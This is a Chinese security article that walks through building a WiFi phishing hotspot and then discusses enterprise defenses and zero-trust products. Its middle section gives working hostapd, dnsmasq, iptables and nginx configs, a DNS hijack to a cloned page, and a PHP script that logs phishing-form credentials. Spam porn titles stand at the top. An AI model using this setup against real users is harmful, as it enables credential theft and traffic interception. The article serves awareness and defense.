精品国产亚洲一区二区三区|亚洲国产精彩中文乱码AV|久久久久亚洲AV综合波多野结衣|漂亮少妇各种调教玩弄在线

<blockquote id="ixlwe"><option id="ixlwe"></option></blockquote>
  • <span id="ixlwe"></span>

  • <abbr id="ixlwe"></abbr>

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    無(wú)線釣魚(yú)是一個(gè)廣受關(guān)注但難以根治的熱點(diǎn)安全話題。本文中,我將以攻擊者視角揭露無(wú)線釣魚(yú)攻擊的技術(shù)原理,包括DNS劫持、Captive Portal、JS緩存投毒等有趣的攻擊利用。隨后將探討企業(yè)該如何幫助員工應(yīng)對(duì)無(wú)線釣魚(yú)攻擊。企業(yè)內(nèi)做釣魚(yú)熱點(diǎn)防護(hù)就夠了嗎?如何進(jìn)行有效的無(wú)線安全意識(shí)培訓(xùn)?使用VPN就能抗住所有攻擊?員工在非信任無(wú)線網(wǎng)絡(luò)中進(jìn)行遠(yuǎn)程辦公是不可避免的安全挑戰(zhàn),零信任產(chǎn)品帶來(lái)了更多的解決思路。

    1.無(wú)線釣魚(yú)的背景

    2019年,我在前公司時(shí)配合湖南衛(wèi)視《新聞大求真》欄目組共同制作了一期關(guān)于公共無(wú)線熱點(diǎn)安全性的節(jié)目,曾直觀地呈現(xiàn)了公共無(wú)線熱點(diǎn)的危險(xiǎn)性。

    從無(wú)線網(wǎng)絡(luò)接入者的角度來(lái)看,其安全性完全取決于無(wú)線網(wǎng)絡(luò)搭建者的身份。受到各種客觀因素的限制,很多數(shù)據(jù)在無(wú)線網(wǎng)絡(luò)上傳輸時(shí)都是明文的,如一般的網(wǎng)頁(yè)、圖片等;還有很多網(wǎng)站或郵件系統(tǒng)甚至在手機(jī)用戶進(jìn)行登錄時(shí),將賬號(hào)和密碼也進(jìn)行了明文傳輸或只是簡(jiǎn)單加密傳輸。

    因此,一旦有手機(jī)接入攻擊者架設(shè)的釣魚(yú)熱點(diǎn),通過(guò)該網(wǎng)絡(luò)傳輸?shù)母鞣N信息(包括賬號(hào)和密碼等)就有可能被攻擊者所截獲。

    1.1 Wi-Fi綿羊墻

    很長(zhǎng)時(shí)間中,無(wú)線網(wǎng)絡(luò)的安全風(fēng)險(xiǎn)一直未被公眾所熟知。2015年的央視3·15晚會(huì)“釣魚(yú)熱點(diǎn)”環(huán)節(jié)的演示,才第一次讓國(guó)內(nèi)較為廣大的群體對(duì)此有了直觀認(rèn)識(shí)。

    在晚會(huì)現(xiàn)場(chǎng),觀眾加入主辦方指定的一個(gè)Wi-Fi 網(wǎng)絡(luò)后,用戶手機(jī)上正在使用哪些軟件、用戶通過(guò)微信朋友圈瀏覽的照片等信息就都被顯示在了大屏幕上。不僅如此,現(xiàn)場(chǎng)大屏幕上還展示了很多用戶的電子郵箱信息。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    特別值得一提的是,主持人在采訪一位郵箱密碼被展示出來(lái)的現(xiàn)場(chǎng)觀眾時(shí),這位觀眾明確表示,到現(xiàn)場(chǎng)以后并沒(méi)有登錄電子郵箱。造成這種情況的原因是該用戶所使用的電子郵箱軟件在手機(jī)接入無(wú)線網(wǎng)絡(luò)后,自動(dòng)聯(lián)網(wǎng)進(jìn)行了數(shù)據(jù)更新,而在更新過(guò)程中,郵箱的賬號(hào)和密碼都被進(jìn)行了明文傳輸。這個(gè)現(xiàn)場(chǎng)實(shí)驗(yàn)告訴我們:攻擊者通過(guò)釣魚(yú)熱點(diǎn)盜取用戶個(gè)人信息,用戶往往是完全感覺(jué)不到的。

    這個(gè)演示環(huán)節(jié)的靈感其實(shí)是來(lái)源于DEFCON 黑客大會(huì) Wireless Village 上有名的綿羊墻(The Wall of Sheep)。綿羊墻將收集的賬號(hào)和隱匿的密碼投影在影幕上,告訴人們:“你很可能隨時(shí)都被監(jiān)視。”同時(shí)也是為了讓那些參會(huì)者難堪——來(lái)參加黑客大會(huì)的人,自身也不注意安全。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    1.2 真實(shí)案例

    l用戶在釣魚(yú)熱點(diǎn)中進(jìn)行網(wǎng)購(gòu)導(dǎo)致密碼泄漏,被盜刷2000元。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    l咖啡店無(wú)線網(wǎng)絡(luò)被植入惡意代碼,利用用戶設(shè)備挖掘門(mén)羅幣。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    l騰訊內(nèi)網(wǎng)有員工反饋在地鐵站中自動(dòng)連上偽造的公司熱點(diǎn)“XXXXWiFi”,被迫瀏覽“反宣文案”。2.無(wú)線釣魚(yú)底層原理探析

    本節(jié)將通過(guò)搭建一個(gè)無(wú)線釣魚(yú)熱點(diǎn),展示該攻擊方式的危害性、隱蔽性和低成本性。讀者將學(xué)習(xí)到構(gòu)造一個(gè)精密的無(wú)線釣魚(yú)網(wǎng)絡(luò)所涉及的所有實(shí)現(xiàn)原理,包括如何使用無(wú)線網(wǎng)卡創(chuàng)建熱點(diǎn)、如何吸引更多用戶連接熱點(diǎn)、如何嗅探網(wǎng)絡(luò)中的敏感信息、如何利用釣魚(yú)網(wǎng)頁(yè)獲取用戶敏感信息以及如何配置Captive Portal 強(qiáng)制用戶訪問(wèn)釣魚(yú)界面。

    需要注意的是,本節(jié)的實(shí)驗(yàn)需要無(wú)線網(wǎng)卡支持AP 模式才能建立熱點(diǎn),如Atheros AR9271、Atheros RTL8812等。

    2.1創(chuàng)建無(wú)線熱點(diǎn)

    hostapd是用于AP和認(rèn)證服務(wù)器的守護(hù)進(jìn)程,它實(shí)現(xiàn)了與IEEE 802.11相關(guān)的接入管理,支持IEEE 802.1X、WPA、WPA2、EAP、OPEN等認(rèn)證方式。首先,創(chuàng)建配置文件open.conf:

    #open.conf

    interface=wlan0

    ssid=FreeWiFi

    driver=nl80211

    channel=1

    hw_mode=g

    其中interface 表示無(wú)線網(wǎng)卡接口名稱(chēng),ssid 表示熱點(diǎn)名稱(chēng),channel 表示信道,hw_mode 用于指定無(wú)線模式,g代表 IEEE 802.11g。讀者可根據(jù)實(shí)際情況做相應(yīng)修改。

    除了創(chuàng)建接入點(diǎn)本身外,還需要配置DHCP 和 DNS 等基礎(chǔ)服務(wù)。 dnsmasq 是一款可同時(shí)提供 DNS 和 DHCP 服務(wù)功能、較易配置的輕量工具。其默認(rèn)配置文件為/etc/dnsmasq.conf,其中包含大量的注釋?zhuān)靡哉f(shuō)明各項(xiàng)功能及配置方法。在默認(rèn)情況下,它會(huì)開(kāi)啟 DNS 功能,同時(shí)加載系統(tǒng)/etc/resolv.conf 文件中的內(nèi)容作為上游 DNS 信息。只需要在配置文件中設(shè)置特定的 DHCP 地址池范圍和所服務(wù)的網(wǎng)絡(luò)接口即可。代碼如下:

    #/etc/dnsmasq.conf

    dhcp-range=172.5.5.100, 172.5.5.250, 12h

    interface=wlan0

    在運(yùn)行hostapd 創(chuàng)建熱點(diǎn)前,還需要使用幾條命令消除系統(tǒng)對(duì)網(wǎng)卡 AP 功能的限制,同時(shí)為網(wǎng)卡配置 IP 地址、掩碼等信息,最后才能啟動(dòng) hostapd 程序。命令如下:

    nmcli radio wifi off

    rfkill unblock wlan

    ifconfig wlan0 172.5.5.1/24

    systemctl restart dnsmasq

    hostapd open.conf

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    2.2 吸引用戶連接

    將熱點(diǎn)名稱(chēng)設(shè)置為Free WiFi 類(lèi)似的字眼就能吸引許多蹭網(wǎng)的用戶主動(dòng)連接。除此外,攻擊者還有其他辦法讓手機(jī)等設(shè)備自動(dòng)連上熱點(diǎn),例如構(gòu)建一個(gè)用戶之前連過(guò)的熱點(diǎn)名稱(chēng)(如CMCC、StarBucks 等),同樣為無(wú)加密的方式。當(dāng)無(wú)線設(shè)備搜索到該同名、同加密類(lèi)型的歷史連接熱點(diǎn)(后文稱(chēng)為已保存網(wǎng)絡(luò)列表)就會(huì)嘗試自動(dòng)連接。那么,是否可以通過(guò)某種方式獲取無(wú)線設(shè)備的已保存網(wǎng)絡(luò)列表信息呢?

    無(wú)線設(shè)備為了加快連接速度,在執(zhí)行主動(dòng)掃描時(shí)會(huì)對(duì)外廣播曾經(jīng)連接過(guò)的無(wú)線熱點(diǎn)名稱(chēng)。一旦攻擊者截獲這個(gè)廣播,自然就能知道用戶連過(guò)哪些熱點(diǎn),隨后把所有的無(wú)線熱點(diǎn)名稱(chēng)偽造出來(lái)欺騙設(shè)備自動(dòng)連接。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    2004 年,Dino dai Zovi 和 Shane Macaulay 兩位安全研究員發(fā)布了 Karma 工具。Karma 能夠收集客戶端主動(dòng)掃描時(shí)泄露的已保存網(wǎng)絡(luò)列表并偽造該名稱(chēng)的無(wú)密碼熱點(diǎn),吸引客戶端自動(dòng)連接。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    如上圖所示,一個(gè)客戶端發(fā)出了對(duì)兩個(gè)不同熱點(diǎn)名稱(chēng)(Home 和 Work)的 Probe Request 請(qǐng)求, Karma 對(duì)包含這兩個(gè)熱點(diǎn)名稱(chēng)的請(qǐng)求都進(jìn)行了回復(fù)。這實(shí)際上違反了 802.11 標(biāo)準(zhǔn)協(xié)議,無(wú)論客戶端請(qǐng)求任何 SSID,Karma 都會(huì)向其回復(fù)表示自己就是客戶端所請(qǐng)求的熱點(diǎn),使客戶端發(fā)起連接。

    一款知名的無(wú)線安全審計(jì)設(shè)備——WiFi Pineapple(俗稱(chēng)“大菠蘿”)便內(nèi)置了 Karma 攻擊的功能,由無(wú)線安全審計(jì)公司 Hak5 開(kāi)發(fā)并售賣(mài),從 2008 年起到目前已經(jīng)發(fā)布到第七代產(chǎn)品。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    Hak5 公司的創(chuàng)始人 Darren Kitchen 曾在一次會(huì)議上發(fā)表了有關(guān)的安全演講。在現(xiàn)場(chǎng),他開(kāi)啟Pineapple 進(jìn)行演示,在屏幕上展示了一份長(zhǎng)長(zhǎng)的設(shè)備清單,包含黑莓、iPhone、Android 和筆記本電腦等。這些設(shè)備自認(rèn)為連接到了賓館或星巴克的 Wi-Fi 熱點(diǎn),實(shí)際上它們都受到了 WiFi Pineapple 的欺騙而連接到其所創(chuàng)建的釣魚(yú)網(wǎng)絡(luò)。

    不過(guò)在今天,Karma 攻擊已經(jīng)不太好使了。因?yàn)楦魇謾C(jī)廠商了解到 Directed Probe Request 會(huì)泄露已保存網(wǎng)絡(luò)列表信息,可能導(dǎo)致終端遭到釣魚(yú)攻擊,所以在較新版本的手機(jī)系統(tǒng)中都改變了主動(dòng)掃描的實(shí)現(xiàn)方式:主要是使用不帶 SSID 信息的 Broadcast Probe Request 取代會(huì)泄露信息的 Directed Probe Request,兩者的對(duì)比如下圖所示。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    我們可以采取一些簡(jiǎn)單的策略吸引用戶連接:

    l選擇一家提供免費(fèi)無(wú)線網(wǎng)絡(luò)、還提供電源和座位的咖啡館

    l熱點(diǎn)名稱(chēng)改為與店里的免費(fèi)熱點(diǎn)名稱(chēng)一致

    l同時(shí)發(fā)起deauth拒絕服務(wù)攻擊使周?chē)蛻舳说艟€觸發(fā)重連

    如此就可以將周?chē)臒o(wú)線客戶端吸引到我們的釣魚(yú)熱點(diǎn)上。

    2.3 嗅探敏感信息

    當(dāng)我們的設(shè)備能通過(guò)無(wú)線或有線的方式接入互聯(lián)網(wǎng)時(shí),為了使用戶設(shè)備上的軟件有更多網(wǎng)絡(luò)交互并獲取更多的信息,可以將釣魚(yú)網(wǎng)絡(luò)的流量轉(zhuǎn)發(fā)至擁有互聯(lián)網(wǎng)權(quán)限的網(wǎng)卡,從而使釣魚(yú)網(wǎng)絡(luò)也能連上外網(wǎng)??梢园凑障旅娴牟僮鞑襟E進(jìn)行。首先開(kāi)啟IP 路由轉(zhuǎn)發(fā)功能:

    sysctl -w net.ipv4.ip_forward=1

    隨后還需設(shè)置iptables 規(guī)則,將來(lái)自釣魚(yú)網(wǎng)絡(luò)的數(shù)據(jù)包進(jìn)行 NAT(network address translation,網(wǎng)絡(luò)地址轉(zhuǎn)換)處理并轉(zhuǎn)發(fā)到外網(wǎng)出口。

    iptables -t nat - POSTROUTING -o eth0 -j MASQUERADE

    當(dāng)用戶連入網(wǎng)絡(luò)后,由于所有的網(wǎng)絡(luò)請(qǐng)求都將經(jīng)由我們的網(wǎng)卡進(jìn)行轉(zhuǎn)發(fā),所以可以使用Wireshark、 Tcpdump 等工具直接觀察經(jīng)過(guò)該無(wú)線網(wǎng)卡的所有流量。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    Driftnet 是一款簡(jiǎn)單、實(shí)用的圖片捕獲工具,可以很方便地抓取網(wǎng)絡(luò)流量中的圖片。使用

    driftnet -i wlan0

    命令運(yùn)行Driftnet 程序,會(huì)在彈出的窗口中實(shí)時(shí)顯示用戶正在瀏覽的網(wǎng)頁(yè)中的圖片。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    2.4 配置惡意DNS服務(wù)

    很多時(shí)候,我們會(huì)面臨無(wú)外網(wǎng)的情況,用戶設(shè)備上的軟件由于無(wú)法與其服務(wù)器交互,大大減少了敏感信息暴露的機(jī)會(huì)。除了被動(dòng)嗅探流量中的信息外,還可以在本地部署釣魚(yú)網(wǎng)站來(lái)誘導(dǎo)用戶填入敏感信息。

    無(wú)線客戶端連接網(wǎng)絡(luò)時(shí),通過(guò)DHCP 服務(wù)不僅能獲取到本地的 IP 地址,還包括 DHCP 服務(wù)指定的 DNS 服務(wù)地址。當(dāng)我們可以決定用戶的 DNS 解析結(jié)果時(shí),釣魚(yú)攻擊就可以達(dá)到比較完美的效果——界面和域名都與真實(shí)網(wǎng)址一致。在本節(jié)中,我們將學(xué)習(xí)如何操縱用戶的 DNS 解析結(jié)果,從而將用戶對(duì)任意網(wǎng)址的訪問(wèn)解析到本地。

    實(shí)驗(yàn)?zāi)康模嚎寺ww.google.cn 界面到本地,并使無(wú)線客戶端對(duì)指定網(wǎng)頁(yè)的訪問(wèn)指向該克隆界面。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    (1)打開(kāi)網(wǎng)頁(yè) www.google.cn,通過(guò)把網(wǎng)頁(yè)“另存為”的方式,將代碼下載到本地。接著需要配置 Web 服務(wù)器,以 nginx 為例,打開(kāi)配置文件/etc/nginx/sites-enable/default,輸入以下內(nèi)容:

    server {

    listen 80 default_server;

    root /var/www/fakesite;

    index index.html

    location / {

    try_files $uri $uri/ /index.html;

    }

    }

    (2) 該配置文件指定本地 Web 服務(wù)監(jiān)聽(tīng) 80 端口并以/var/www/fakesite 為根目錄,將下載的 HTML代碼放置到 Web 目錄中并重啟 nginx 服務(wù),隨后通過(guò)瀏覽器訪問(wèn) 172.5.5.1 查看效果。隨后對(duì) DNS 服務(wù)進(jìn)行配置,同樣打開(kāi) dnsmasq 的配置文件/etc/dnsmasq.conf,以 address=/url/ip的格式寫(xiě)入解析規(guī)則,表示將指定 URL 解析到指定 IP 地址。如果 url 處填寫(xiě)為#,將解析所有的地址,隨后重啟 dnsmasq 服務(wù)。

    #/etc/dnsmasq.conf

    address=/#/172.5.5.1

    systemctl restart nginx

    systemctl restart dnsmasq

    (3)通過(guò)手機(jī)連接該熱點(diǎn),對(duì)任意地址進(jìn)行訪問(wèn)測(cè)試(如 baidu.com),如果配置無(wú)誤,將出現(xiàn)如圖所示的效果。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    2.5 配置Captive Portal

    Captive Portal 認(rèn)證通常被部署在公共無(wú)線網(wǎng)絡(luò)中,當(dāng)未認(rèn)證用戶連接時(shí),會(huì)強(qiáng)制用戶跳轉(zhuǎn)到指定界面。

    在iOS、Android、Windows、Mac OS X 等系統(tǒng)中其實(shí)已經(jīng)包含了對(duì) Captive Portal 的檢測(cè),以 Android 系統(tǒng)為例,當(dāng)設(shè)備連入無(wú)線網(wǎng)絡(luò)時(shí)會(huì)嘗試請(qǐng)求訪問(wèn)clients3.google. com/generate_204并根據(jù)返回結(jié)果來(lái)判斷網(wǎng)絡(luò)狀況。

    l當(dāng)返回HTTP 204 時(shí),表示網(wǎng)絡(luò)正常;

    l如果返回了HTTP 302 跳轉(zhuǎn),手機(jī)就會(huì)認(rèn)為該網(wǎng)絡(luò)存在網(wǎng)絡(luò)認(rèn)證,并以彈窗等方式顯示在手機(jī)中,如下圖所示的提示信息。

    liOS、Windows 等系統(tǒng)也都采取類(lèi)似的檢測(cè)邏輯。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    單擊該提示就會(huì)直接打開(kāi)認(rèn)證界面。顯然,一個(gè)熱點(diǎn)配置了Captive Portal 后會(huì)更顯得像是一個(gè)“正式”的熱點(diǎn),同時(shí)利用該特性能讓用戶直達(dá)釣魚(yú)界面。

    我們使用iptables來(lái)轉(zhuǎn)換流量。iptables 是一種能完成封包過(guò)濾、重定向和網(wǎng)絡(luò)地址轉(zhuǎn)換(NAT)等功能的命令行工具。借助這個(gè)工具可以把用戶的安全設(shè)定規(guī)則執(zhí)行到底層安全框架 netfilter 中,起到防火墻的作用。

    通過(guò)iptables 對(duì)來(lái)自無(wú)線網(wǎng)絡(luò)的流量進(jìn)行配置:

    iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 172.5.5.1:80

    iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j DNAT --to-destination 172.5.5.1:53

    iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 53 -j DNAT --to-destination 172.5.5.1:53

    在上述命令中,第1行表示將來(lái)自 NAT 網(wǎng)絡(luò)的對(duì) 80 端口的數(shù)據(jù)請(qǐng)求都指向 172.5.5.1 的 80 端口;第 2~3 行表示將來(lái)自 NAT 網(wǎng)絡(luò)的對(duì) 53 端口的 TCP、UDP 請(qǐng)求都指向 172.5.5.1的 53 端口。

    接下來(lái)的任務(wù)是在本地啟動(dòng)HTTP服務(wù),并配置網(wǎng)頁(yè)信息及對(duì)相應(yīng)請(qǐng)求的 302跳轉(zhuǎn)等。同樣以nginx為例,打開(kāi)/etc/nginx/sites-enabled/default 文件,修改為以下配置:

    server {

    listen 80 default_server;

    root /var/www/html;

    location / {

    try_files $uri $uri/ /index.html;

    }

    location ~ \.php$ {

    includesnippets/fastcgi-php.conf;

    fastcgi_passunix:/var/run/php/php7.0-fpm.sock;

    }

    }

    在上述配置中,會(huì)將/var/www/html 指定為 Web 根目錄,當(dāng)訪問(wèn)不存在的路徑時(shí)都會(huì)被 302 跳轉(zhuǎn)到 index.html 文件。同時(shí)還開(kāi)啟了對(duì) PHP 文件的解析,因?yàn)楹罄m(xù)會(huì)使用 PHP 程序來(lái)將用戶輸入的賬號(hào)保存到本地。

    使用網(wǎng)絡(luò)上下載的Gmail釣魚(yú)模板,將提交賬號(hào)信息的form表單指向post.php。

    #post.php

    $file = 'log.txt';

    file_put_contents($file, print_r($_POST, true), FILE_APPEND);

    ?>

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    最后,重啟nginx 及php 服務(wù)使配置生效,命令如下:

    systemctl restart nginx

    systemctl restart php7.0-fpm

    使用手機(jī)連接該熱點(diǎn),會(huì)立即得到需要認(rèn)證的提示。打開(kāi)提示后便出現(xiàn)了預(yù)設(shè)的釣魚(yú)界面。可以嘗試在登錄框中輸入任意賬號(hào)密碼并單擊Sign in 按鈕進(jìn)行提交。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    在Web 根目錄下,可以查看記錄了用戶輸入信息的log.txt 文件,內(nèi)容如下圖所示。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    2.6 其他的利用案例

    l在多屆Pwn2own比賽上,許多通過(guò)瀏覽器發(fā)起的攻擊都利用了Wi-Fi Captive Portal的特性來(lái)觸發(fā)瀏覽器漏洞。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    l在2018年日本CodeBlue會(huì)議上,筆者和前同事展示了一個(gè)議題《RCE with Captive Portal)》,介紹了一種組合攻擊方法,利用無(wú)線網(wǎng)絡(luò)強(qiáng)制門(mén)戶的特性與Windows系統(tǒng)的一系列漏洞來(lái)達(dá)到遠(yuǎn)程代碼執(zhí)行的效果。

    lJS緩存投毒

    由于在釣魚(yú)熱點(diǎn)中可以劫持DNS服務(wù)器,加上企業(yè)內(nèi)網(wǎng)存在大量非https的網(wǎng)站現(xiàn)狀,攻擊者可以有針對(duì)性的將惡意JS文件緩存在受害者瀏覽器中,當(dāng)員工訪問(wèn)內(nèi)網(wǎng)時(shí)惡意JS文件將會(huì)被喚醒執(zhí)行。

    3.企業(yè)無(wú)線釣魚(yú)防護(hù)的窘境與突破

    3.1普通用戶的應(yīng)對(duì)策略

    前面的內(nèi)容以攻擊者的角度詳細(xì)討論了釣魚(yú)熱點(diǎn)的構(gòu)建方式及可能造成的危害,相信讀者已經(jīng)體會(huì)到這是一種低成本、高回報(bào)的攻擊方式。那么作為普通用戶,該如何避免遭到釣魚(yú)熱點(diǎn)的攻擊呢?可以遵循以下簡(jiǎn)單規(guī)則來(lái)保護(hù)個(gè)人數(shù)據(jù):

    (1)對(duì)公共Wi-Fi網(wǎng)絡(luò)采取不信任的態(tài)度,盡量不連接沒(méi)有密碼保護(hù)的無(wú)線網(wǎng)絡(luò)。

    (2)在使用公共熱點(diǎn)時(shí),盡量避免輸入社交網(wǎng)絡(luò)、郵件服務(wù)、網(wǎng)上銀行等登錄信息,避免使用網(wǎng)銀、支付寶等包含敏感信息的應(yīng)用軟件。

    (3)在不使用Wi-Fi時(shí)關(guān)閉Wi-Fi功能,避免自動(dòng)連接功能帶來(lái)的風(fēng)險(xiǎn)。

    (4)在有條件的情況下,使用虛擬專(zhuān)用網(wǎng)絡(luò)(VPN)連接,這將使用戶數(shù)據(jù)通過(guò)受保護(hù)的隧道傳輸。

    3.2 企業(yè)無(wú)線釣魚(yú)防護(hù)的窘境

    普通用戶的應(yīng)對(duì)策略都依靠用戶自身的安全意識(shí),實(shí)際上對(duì)于企業(yè)級(jí)用戶而言,要求每一位員工都擁有良好的無(wú)線安全意識(shí)且能在日常使用時(shí)做到,是很難達(dá)到的。當(dāng)然,企業(yè)也會(huì)采取其他一些防護(hù)措施以盡可能緩解無(wú)線安全威脅,但效果都不夠理想,常見(jiàn)以下三個(gè)話題:

    l如何做有效的無(wú)線安全意識(shí)培訓(xùn)?

    l部署WIPS產(chǎn)品阻斷惡意熱點(diǎn)能解決所有問(wèn)題嗎?

    lVPN能抗住所有攻擊嗎?

    (1)無(wú)線安全意識(shí)培訓(xùn)

    筆者在前公司安全團(tuán)隊(duì)曾策劃了一次針對(duì)公司內(nèi)部全體員工的RedTeam無(wú)線釣魚(yú)活動(dòng),通過(guò)精心設(shè)計(jì)“薅羊毛活動(dòng)”、精美的彩印宣傳單、釣魚(yú)網(wǎng)頁(yè)等素材,在約半小時(shí)內(nèi)誘導(dǎo)80位員工連入釣魚(yú)熱點(diǎn)并獲取他們的域賬號(hào)。下圖為前老板對(duì)該次無(wú)線釣魚(yú)演習(xí)的評(píng)論,以此督促全體員工加強(qiáng)對(duì)無(wú)線安全的重視。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    事實(shí)上,在該活動(dòng)實(shí)施的前一個(gè)月正是內(nèi)部的“無(wú)線安全月”,在公司內(nèi)部通過(guò)大量的文字和宣傳冊(cè),以及參與活動(dòng)領(lǐng)獎(jiǎng)品的方法來(lái)告訴員工無(wú)線安全的重要性和注意事項(xiàng)。但實(shí)踐說(shuō)明,再多的安全播報(bào)、新聞稿可能抵不過(guò)一條薅羊毛信息。而對(duì)于參與到該釣魚(yú)活動(dòng)并中招的員工來(lái)說(shuō),可能他這輩子都能記住不要亂連Wi-Fi及核實(shí)消息來(lái)源。

    (2)WIPS阻斷熱點(diǎn)

    部分企業(yè)AP產(chǎn)品或單獨(dú)部署的WIPS產(chǎn)品(無(wú)線入侵防御系統(tǒng))帶有熱點(diǎn)阻斷功能,通過(guò)MAC地址黑白名單的策略來(lái)觸發(fā)自動(dòng)阻斷嫌疑熱點(diǎn),但從實(shí)際的運(yùn)營(yíng)中會(huì)發(fā)現(xiàn)會(huì)殘留以下問(wèn)題:

    l攻擊者可能偽造白名單熱點(diǎn)的MAC地址。

    l對(duì)于非同名的釣魚(yú)熱點(diǎn),很難發(fā)現(xiàn)與監(jiān)管。

    l防御范圍僅能實(shí)施在大廈內(nèi)。

    因此,阻斷熱點(diǎn)的功能并不能解決所有的釣魚(yú)熱點(diǎn)問(wèn)題。

    (3)VPN

    在Wi-Fi場(chǎng)景中,根據(jù)Captive Portal和VPN狀態(tài)可劃分出三個(gè)階段:

    1.Captive Portal認(rèn)證前。

    2.Captive Portal認(rèn)證后、VPN連接前。

    3.VPN連接后。

    大部分VPN產(chǎn)品僅能在第三階段提供流量加密和部分防護(hù)功能,而在第二節(jié)的內(nèi)容中我們已經(jīng)了解到了在VPN開(kāi)啟前攻擊無(wú)線客戶端的多種手法,所以想單憑VPN的能力來(lái)防范所有的無(wú)線攻擊是不現(xiàn)實(shí)的。

    3.3 企業(yè)無(wú)線釣魚(yú)防護(hù)的突破

    在2020年疫情大背景下,全球企業(yè)都被迫加速員工移動(dòng)化辦公、遠(yuǎn)程辦公的實(shí)施進(jìn)程,這也再次帶動(dòng)了業(yè)界對(duì)網(wǎng)絡(luò)邊緣安全性的重點(diǎn)關(guān)注。

    我在導(dǎo)讀中提到“員工在非信任無(wú)線網(wǎng)絡(luò)中進(jìn)行遠(yuǎn)程辦公是不可避免的安全挑戰(zhàn)”,在遠(yuǎn)程辦公這種脫離內(nèi)網(wǎng)的網(wǎng)絡(luò)條件下,無(wú)法采取網(wǎng)絡(luò)層面的入侵檢測(cè)等防護(hù)手段,唯一可實(shí)施切入的便是終端上的安全能力,但傳統(tǒng)的VPN產(chǎn)品和終端安全軟件產(chǎn)品在提供安全管控、身份管理、訪問(wèn)準(zhǔn)入的能力上是各自為戰(zhàn)、相互割裂的狀態(tài),這就亟需一種有效的方式把這些能力聯(lián)合在一起,可以根據(jù)具體場(chǎng)景相互配合來(lái)為決策提供信息支撐。

    在我加入騰訊,實(shí)際體驗(yàn)使用了內(nèi)部的iOA零信任產(chǎn)品后,發(fā)現(xiàn)在零信任網(wǎng)絡(luò)接入的框架下,員工終端設(shè)備需要具有終端檢測(cè)和防護(hù)等安全模塊,對(duì)每一個(gè)訪問(wèn)企業(yè)資源的會(huì)話請(qǐng)求,都需要進(jìn)行用戶身份驗(yàn)證、設(shè)備安全狀態(tài)、軟件應(yīng)用安全狀態(tài)檢查和授權(quán),并進(jìn)行全鏈路加密。過(guò)程中的驗(yàn)證本質(zhì)上就是一系列的合規(guī)檢查,從邏輯上可劃分為四類(lèi):可信身份、可信終端、可信應(yīng)用、可信鏈路,如下圖所示。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    針對(duì)我們?cè)诠矆?chǎng)所遠(yuǎn)程辦公的場(chǎng)景,新接入的設(shè)備需要統(tǒng)一安裝Agent,通過(guò)遠(yuǎn)程下發(fā)策略提供統(tǒng)一標(biāo)準(zhǔn)化的要求,其中就可以把對(duì)無(wú)線釣魚(yú)攻擊的檢測(cè)和防護(hù)作為安全準(zhǔn)入的合規(guī)條件,如下圖所示。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    因此,我們?cè)俅位仡^看看前文提到的多種無(wú)線釣魚(yú)攻擊手段,可以發(fā)現(xiàn),以零信任理念構(gòu)建的終端安全產(chǎn)品可以做到防止員工連入釣魚(yú)熱點(diǎn),或即使連入了釣魚(yú)熱點(diǎn)也能受到保護(hù):

    l偽造公司熱點(diǎn)無(wú)線釣魚(yú)攻擊——公司內(nèi)部真實(shí)無(wú)線熱點(diǎn)的數(shù)據(jù)我們是掌握的,因此當(dāng)用戶設(shè)備主動(dòng)或被動(dòng)連接開(kāi)放式網(wǎng)絡(luò)時(shí),零信任終端安全產(chǎn)品可結(jié)合正在連接熱點(diǎn)的MAC地址及其他無(wú)線特征進(jìn)行WiFi接入點(diǎn)身份驗(yàn)證,驗(yàn)證失敗時(shí)拒絕訪問(wèn)請(qǐng)求并警告用戶遭到無(wú)線釣魚(yú)攻擊。

    lDNS劫持——當(dāng)設(shè)備通過(guò)DHCP服務(wù)獲取IP地址時(shí),也采取了該網(wǎng)絡(luò)指定的DNS地址。零信任終端安全產(chǎn)品可以對(duì)設(shè)備DNS狀態(tài)進(jìn)行合規(guī)性檢查,可以采取強(qiáng)制指定DNS服務(wù)地址的策略,或檢測(cè)該DNS服務(wù)對(duì)互聯(lián)網(wǎng)重點(diǎn)域名或公司相關(guān)域名的解析是否正常。驗(yàn)證失敗時(shí)拒絕訪問(wèn)請(qǐng)求并幫助用戶修復(fù)異常DNS狀態(tài)。

